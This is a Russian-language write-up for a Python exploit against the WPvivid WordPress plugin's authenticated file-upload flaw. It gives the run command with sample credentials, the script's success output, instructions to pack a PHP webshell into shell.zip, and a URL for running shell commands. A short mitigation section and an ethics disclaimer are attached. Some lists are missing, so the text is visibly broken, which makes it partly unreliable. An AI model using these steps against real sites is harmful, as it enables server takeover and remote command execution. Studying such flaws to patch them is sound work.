
Опубликовано: 2024-10-16 | Миграция, резервное копирование, промежуточная среда – WPvivid <= 0.9.35 - Произвольная загрузка файлов аутентифицированным пользователем (Subscriber+)
Плагин WPvivid для WordPress, предназначенный для миграции сайтов и создания резервных копий, содержит уязвимость произвольной загрузки файлов. Эта уязвимость позволяет аутентифицированным пользователям с низкими привилегиями загружать и извлекать ZIP-архивы, что потенциально может привести к удалённому выполнению кода (RCE) при размещении вредоносного скрипта среди извлечённых файлов.
Для эксплуатации этой уязвимости был создан эксплойт-скрипт на Python, использующий следующую методику:
При успешной эксплуатации скрипт выведет:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
Убедитесь, что вредоносный файл shell.zip находится в том же каталоге, что и скрипт эксплойта.
Файл shell.zip должен содержать PHP-веб-шелл (например, nxploit.php).
Требуется действующая учётная запись WordPress с правами не ниже Subscriber.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
Скрипт проверит версию целевого сайта и выполнит вход с использованием предоставленных учётных данных.
Если целевой сайт уязвим, скрипт загрузит shell.zip и извлечёт его.
При успехе скрипт предоставит URL-адрес загруженного шелла.
После успешной загрузки и извлечения шелла вы можете взаимодействовать с ним, отправляя команды через URL:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
Для устранения этой уязвимости настоятельно рекомендуется:
wp-content/uploads с помощью .htaccess или конфигурации сервера.Эта уязвимость представляет серьёзную угрозу, поскольку позволяет аутентифицированным злоумышленникам загружать и выполнять вредоносные файлы на сервере WordPress. Администраторам сайтов следует немедленно принять меры для защиты своих установок.
Отказ от ответственности: Этот документ предназначен исключительно для этических исследований в области безопасности и образовательных целей. Эксплуатация уязвимостей без разрешения незаконна и наказуема в соответствии с действующим законодательством. ( Nxploit | Khaled_alenazi )